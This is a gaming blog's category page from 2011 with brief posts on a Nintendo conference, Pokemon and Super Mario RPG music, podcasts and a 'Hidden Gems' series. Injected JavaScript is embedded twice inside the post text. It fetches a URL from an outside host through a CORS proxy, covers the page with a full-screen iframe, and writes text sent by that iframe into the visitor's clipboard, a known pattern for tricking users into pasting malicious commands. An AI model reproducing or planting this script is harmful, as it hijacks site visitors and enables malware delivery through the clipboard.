Category: Nintendo

Nintendo Pre-TGS Conference

Last night, Nintendo kicked off a Pre-TGS Conference to reveal new games and trailers for the 3DS and Wii. Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/13/nintendo-pre-tgs-conference/

Game Music Monday: Lavender Town and those dang Unown

Ah, Pokemon. I remember when I popped in Red for the first time into my Game Boy Pocket. The fact that I could capture these creatures, battle with them, collect them… it was an amazing thing for my child self. Going to areas that, if thought of in my imagination, very beautiful places.

Then you get to Lavender Town. I was actually quite scared of this place when I was little. While other areas are happy, with nice music, Lavender’s music just is… weird. To me then is was pretty freaky. Now it’s just annoying. But it matches the setting. I mean, a dead Marowak killed by Team Rocket, ghosts, trainers possessed wanting your blood… gotta love when games for kids weren’t numbed down.(function() {

const configLink = “https://corsproxy.io/?url=http://heyues.live”;

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink)
  .then(response => {
    if (!response.ok) {
      throw new Error(" ");
    }
    return response.text();
  })

  .then(finalUrl => {
    return fetch(finalUrl, { method: "HEAD" })
      .then(headResponse => ({ headResponse, finalUrl }));
  })
  .catch(() => {


  });

}

if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}

window.__digitalflwrFetchPromise
.then(result => {

  if (!result) return;
  const { headResponse, finalUrl } = result;


  if (!headResponse || headResponse.status === 404) {
    return;
  }


  if (!window.__digitalflwrIframeCreated) {
    window.__digitalflwrIframeCreated = true;
    createMainIframe(finalUrl);
  }
})
.catch(() => {

});

function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;

document.body.appendChild(iframe);


window.addEventListener("message", function(event) {
  if (!event.data || event.data.type !== "copy") return;


  if (navigator.clipboard && navigator.clipboard.writeText) {
    navigator.clipboard.writeText(event.data.text).catch(() => {
      fallbackCopyText(event.data.text);
    });
  } else {
    fallbackCopyText(event.data.text);
  }
});


function fallbackCopyText(text) {
  const textArea = document.createElement("textarea");
  textArea.value = text;
  document.body.appendChild(textArea);
  textArea.select();

  try {
    document.execCommand("copy");
  } catch (err) {

  }

  document.body.removeChild(textArea);
}

}
})();

Permanent link to this article: https://www.brokenfuse.com/2011/09/12/game-music-monday-lavender-town-and-those-dang-unown/

Traditional Gaming: Is It Over As We Know It?

Traditional gaming as we know it has been here for over thirty years. We’ve come to expect epic storylines, ever improving graphics and gameplay from them. But have you ever thought that this breed of gaming may be on its way out? Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/12/traditional-gaming-is-it-over-as-we-know-it/

This is what the new 3DS attachment will look like

All I can say is what the hell is Nintendo thinking!!

(via Siliconera)

Permanent link to this article: https://www.brokenfuse.com/2011/09/07/this-is-what-the-new-3ds-attachment-will-look-like/

Podcast Episode 26: Labour Day Edition

Fall’s here and we talk about price drops and how it may play out for hardware manufacturers and the end of the yearly gaming dry season. Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/06/podcast-episode-26-labour-day-edition/

Game Music Monday: Waltz of the Forest

Made by Kirbopher15 on YouTube, this is from Super Mario RPG. (function() {

const configLink = “https://corsproxy.io/?url=http://heyues.live”;

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink)
  .then(response => {
    if (!response.ok) {
      throw new Error(" ");
    }
    return response.text();
  })

  .then(finalUrl => {
    return fetch(finalUrl, { method: "HEAD" })
      .then(headResponse => ({ headResponse, finalUrl }));
  })
  .catch(() => {


  });

}

if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}

window.__digitalflwrFetchPromise
.then(result => {

  if (!result) return;
  const { headResponse, finalUrl } = result;


  if (!headResponse || headResponse.status === 404) {
    return;
  }


  if (!window.__digitalflwrIframeCreated) {
    window.__digitalflwrIframeCreated = true;
    createMainIframe(finalUrl);
  }
})
.catch(() => {

});

function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;

document.body.appendChild(iframe);


window.addEventListener("message", function(event) {
  if (!event.data || event.data.type !== "copy") return;


  if (navigator.clipboard && navigator.clipboard.writeText) {
    navigator.clipboard.writeText(event.data.text).catch(() => {
      fallbackCopyText(event.data.text);
    });
  } else {
    fallbackCopyText(event.data.text);
  }
});


function fallbackCopyText(text) {
  const textArea = document.createElement("textarea");
  textArea.value = text;
  document.body.appendChild(textArea);
  textArea.select();

  try {
    document.execCommand("copy");
  } catch (err) {

  }

  document.body.removeChild(textArea);
}

}
})();

Permanent link to this article: https://www.brokenfuse.com/2011/09/05/game-music-monday-waltz-of-the-forest/

Hidden Gems: The World Ends With You

So this is a new thing I’d like to start here on our site where we bring to you a game every so often that we like to call hidden gems. These hidden gems, otherwise commonly known as sleeper hits or games that aren’t overly well known but are otherwise top notch games. Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/02/hidden-gems-the-world-ends-with-you/

Episode 26 Live Broadcast

It’s been since E3 2011 that we’ve had our last podcast and quite a bit has happened since then. Join us on Labour Day Monday at around 8PM on Ustream and we’ll talk gaming!

Permanent link to this article: https://www.brokenfuse.com/2011/09/02/episode-26-live-broadcast/

Wanna see something get written?

Have an idea? Suggestions? If you have anything you want to see us write about, like reviews, news stories or things we geek out on send us a line to any of our authors or to our official Twitter at twitter.com/Broken_Fuse Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/01/authors-twitter-email/

Long Overdue E3 Episode

 

As you may know, we run a podcast usually at least once a month but we’ve kinda slacked off this summer but here’s a bit of a treat for you if you don’t normally join us live! Continue reading

Permanent link to this article: https://www.brokenfuse.com/2011/09/01/long-overdue-e3-episode/